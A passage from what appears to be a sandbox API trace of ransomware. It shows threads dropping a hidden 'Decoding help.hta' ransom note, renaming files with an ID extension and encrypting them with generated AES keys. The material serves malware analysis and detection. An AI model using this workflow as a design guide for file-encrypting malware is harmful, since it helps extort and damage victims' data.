out: hFindFile=0x10fbc9d8) returned 1 Thread: id = 737 os_tid = 0xfcc [0054.485] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*", lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5d30 [0056.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.142] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d580500, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d580500, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.142] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.142] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.142] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.591] lstrcpyW (in: lpString1=0x25348128, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*" [0056.591] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*") returned 63 [0056.591] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Decoding help.hta" [0056.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\decoding help.hta")) returned 0xffffffff [0056.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9ec [0058.041] WriteFile (in: hFile=0x9ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x17edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x17edfcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.042] CloseHandle (hObject=0x9ec) returned 1 [0058.042] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.042] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.042] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.042] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*" [0058.042] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\*.*") returned 63 [0058.042] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" [0058.042] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" [0058.042] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.042] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.043] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\da_dk\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9ec [0058.043] CreateFileMappingA (hFile=0x9ec, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9f0 [0058.043] CryptAcquireContextA (in: phProv=0x17edfcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x17edfcec*=0x34487a8) returned 1 [0060.173] CryptGenKey (in: hProv=0x34487a8, Algid=0x6610, dwFlags=0x1, phKey=0x17edfce8 | out: phKey=0x17edfce8*=0x42cf198) returned 1 [0060.173] CryptExportKey (in: hKey=0x42cf198, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x17edfbe4, pdwDataLen=0x17edfce4 | out: pbData=0x17edfbe4*, pdwDataLen=0x17edfce4*=0x2c) returned 1 [0060.173] MapViewOfFile (hFileMappingObject=0x9f0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x3300000 [0061.886] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x17edfbe4*, pdwDataLen=0x17edfcf8*=0x40, dwBufLen=0x100 | out: pbData=0x17edfbe4*, pdwDataLen=0x17edfcf8*=0x100) returned 1 [0061.889] CryptEncrypt (in: hKey=0x42cf198, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3300000*, pdwDataLen=0x17edfce4*=0x140, dwBufLen=0x140 | out: pbData=0x3300000*, pdwDataLen=0x17edfce4*=0x140) returned 1 [0061.892] UnmapViewOfFile (lpBaseAddress=0x3300000) returned 1 [0061.893] CloseHandle (hObject=0x9f0) returned 1 [0061.893] CryptDestroyKey (hKey=0x42cf198) returned 1 [0061.893] CryptReleaseContext (hProv=0x34487a8, dwFlags=0x0) returned 1 [0061.894] SetFilePointerEx (in: hFile=0x9ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.894] WriteFile (in: hFile=0x9ec, lpBuffer=0x17edfbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x17edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x17edfbe4*, lpNumberOfBytesWritten=0x17edfcf8*=0x100, lpOverlapped=0x0) returned 1 [0061.895] WriteFile (in: hFile=0x9ec, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x17edfcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x17edfcf8*=0x500, lpOverlapped=0x0) returned 1 [0061.895] CloseHandle (hObject=0x9ec) returned 1 [0061.895] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\da_DK\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0061.895] FindNextFileW (in: hFindFile=0x5a5d30, lpFindFileData=0x17edfd30 | out: lpFindFileData=0x17edfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d580500, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 0 [0061.895] FindClose (in: hFindFile=0x5a5d30 | out: hFindFile=0x5a5d30) returned 1 Thread: id = 738 os_tid = 0xfd0 [0054.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*", lpFindFileData=0x1f11fd30 | out: lpFindFileData=0x1f11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x10fbca18 [0059.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.406] FindNextFileW (in: hFindFile=0x10fbca18, lpFindFileData=0x1f11fd30 | out: lpFindFileData=0x1f11fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.406] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0059.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.406] FindNextFileW (in: hFindFile=0x10fbca18, lpFindFileData=0x1f11fd30 | out: lpFindFileData=0x1f11fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 1 [0059.406] lstrcpyW (in: lpString1=0x1110ba18, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*" [0059.406] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*") returned 64 [0059.406] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Decoding help.hta" [0059.406] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\decoding help.hta")) returned 0xffffffff [0059.406] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4bc [0060.663] WriteFile (in: hFile=0x4bc, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f11fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f11fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0060.664] CloseHandle (hObject=0x4bc) returned 1 [0060.664] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0060.881] lstrcmpiW (lpString1="Decoding help.hta", lpString2="tipresx.dll.mui") returned -1 [0060.881] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0060.881] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*" [0060.881] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*.*") returned 64 [0060.881] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\", lpString2="tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" [0060.881] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" [0060.881] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0060.881] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0060.881] FindNextFileW (in: hFindFile=0x10fbca18, lpFindFileData=0x1f11fd30 | out: lpFindFileData=0x1f11fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe6fbc310, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xe71ab4c9, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xe71d1626, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe00, dwReserved0=0x0, dwReserved1=0x0, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0060.881] FindClose (in: hFindFile=0x10fbca18 | out: hFindFile=0x10fbca18) returned 1 Thread: id = 739 os_tid = 0xfd4 [0054.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*", lpFindFileData=0x1f21fd30 | out: lpFindFileData=0x1f21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a6070 [0056.142] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0056.142] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0x1f21fd30 | out: lpFindFileData=0x1f21fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d5a6660, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x7d5cc7c0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.143] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0056.143] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0056.143] FindNextFileW (in: hFindFile=0x5a6070, lpFindFileData=0x1f21fd30 | out: lpFindFileData=0x1f21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x950fa000, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7d5cc7c0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x950fa000, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15d, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reader_10.0.helpcfg", cAlternateFileName="READER~1.HEL")) returned 1 [0056.592] lstrcpyW (in: lpString1=0x25350130, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*" [0056.592] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*") returned 63 [0056.592] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Decoding help.hta" [0056.592] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\decoding help.hta")) returned 0xffffffff [0056.592] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9f8 [0058.044] WriteFile (in: hFile=0x9f8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1f21fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1f21fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0058.045] CloseHandle (hObject=0x9f8) returned 1 [0058.045] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.045] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Reader_10.0.helpcfg") returned -1 [0058.045] lstrlenW (lpString="Reader_10.0.helpcfg") returned 19 [0058.045] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*" [0058.045] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\*.*") returned 63 [0058.045] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\", lpString2="Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" [0058.045] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" [0058.045] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" [0058.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.046] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\Adobe\\HelpCfg\\de_DE\\Reader_10.0.helpcfg.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\adobe\\helpcfg\\de_de\\reader_10.0.helpcfg.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9f8 [0058.046] CreateFileMappingA (hFile=0x9f8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9fc [0058.046] CryptAcquireContextA (in: phProv=0x1f21fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1f21fcec*=0x3448698) returned 1 [0060.174] CryptGenKey (in: hProv=0x3448698, Algid=0x6610, dwFlags=0x1, phKey=0x1f21fce8 | out: phKey=0x1f21fce8*=0x42cf1d8) returned 1 [0060.174] CryptExportKey (in: hKey=0x42cf1d8, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x1f21fbe4, pdwDataLen=0x1f21fce4 | out: pbData=0x1f21fbe4*, pdwDataLen=0x1f21fce4*=0x2c) returned 1 [0060.174] MapViewOfFile (hFileMappingObject=0x9fc, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x140) returned 0x3910000 [0063.816] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1f21fbe4*, pdwDataLen=0x1f21fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x1f21fbe4*, pdwDataLen=0x1f21fcf8*=0x100) returned 1 [0063.816] CryptEncrypt (in: hKey=0x42cf1d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3910000*, pdwDataLen=0x1f21fce4*=0x140, dwBufLen=0x140 | out: pbData=0x3910000*, pdwDataLen=0x1f21fce4*=0x140) returned 1 [0063.816] UnmapViewOfFile (lpBaseAddress=0x3910000) Thread: id = 740 os_tid = 0xfd8 [0054.486] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*.*", lpFindFileData=0x1f61fd30 | out: lpFindFileData=0x1f61fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5db8b8 [0057.103] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0057.104] FindNextFileW (in: hFindFile=0x5db8b8, lpFindFileData=0x1f61fd30 | out: lpFindFileData=0x1f61fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, 